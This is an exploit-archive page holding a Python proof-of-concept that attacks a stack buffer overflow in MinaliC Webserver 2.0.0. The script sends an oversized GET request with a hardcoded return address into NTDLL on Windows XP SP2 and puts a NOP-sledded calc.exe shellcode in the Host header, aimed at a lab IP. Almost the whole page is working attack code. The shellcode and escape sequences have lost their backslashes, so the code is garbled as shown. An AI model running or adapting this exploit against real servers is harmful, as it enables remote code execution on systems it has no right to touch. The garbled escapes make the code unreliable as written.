MinaliC Webserver 2.0.0 - Buffer Overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MinaliC Webserver 2.0.0 - Buffer Overflow
# Published : 2013-04-15
# Author :
# Previous Title : aktiv-player version 2.9.0 Crash PoC
# Next Title : ircd-hybrid 8.0.5 - Denial of Service

#!/usr/bin/env python

# Exploit Title: MinaliC Webserver buffer overflow
# Date: 12 Apr 2013
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://minalic.sourceforge.net/
# Version: MinaliC Webserver 2.0.0
# Tested on: Windows XP Pro SP2, English
#
# Description: 
# Remote command execution by triggering a buffer overflow in the GET
# request. 
#

import socket
import struct

# 74 bytes calc.exe from http://code.google.com/p/win-exec-calc-shellcode/
shellcode = (
"x31xd2x52x68x63x61x6cx63x89xe6x52x56x64x8bx72" +
"x30x8bx76x0cx8bx76x0cxadx8bx30x8bx7ex18x8bx5f" +
"x3cx8bx5cx1fx78x8bx74x1fx20x01xfex8bx4cx1fx24" +
"x01xf9x0fxb7x2cx51x42xadx81x3cx07x57x69x6ex45" +
"x75xf1x8bx74x1fx1cx01xfex03x3cxaexffxd7xcc"
)

# EIP at offset 245 when minalic.exe is in C:minalicbin 
# EBX points directly to the "Host:" value, so we put our shellcode there. 
# JMP EBX @ 0x7C955B47, NTDLL.DLL, Windows XP Pro SP2 English

junk = "x41" * 245
ret = struct.pack("<I", 0x7C955B47)
host = "x90" * 30 + shellcode + "x90" * 31

buf = "GET /" + junk + ret + " HTTP/1.1rn" + "Host: " + host + "rnrn"

print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.37.132", 8080))
s.send(buf)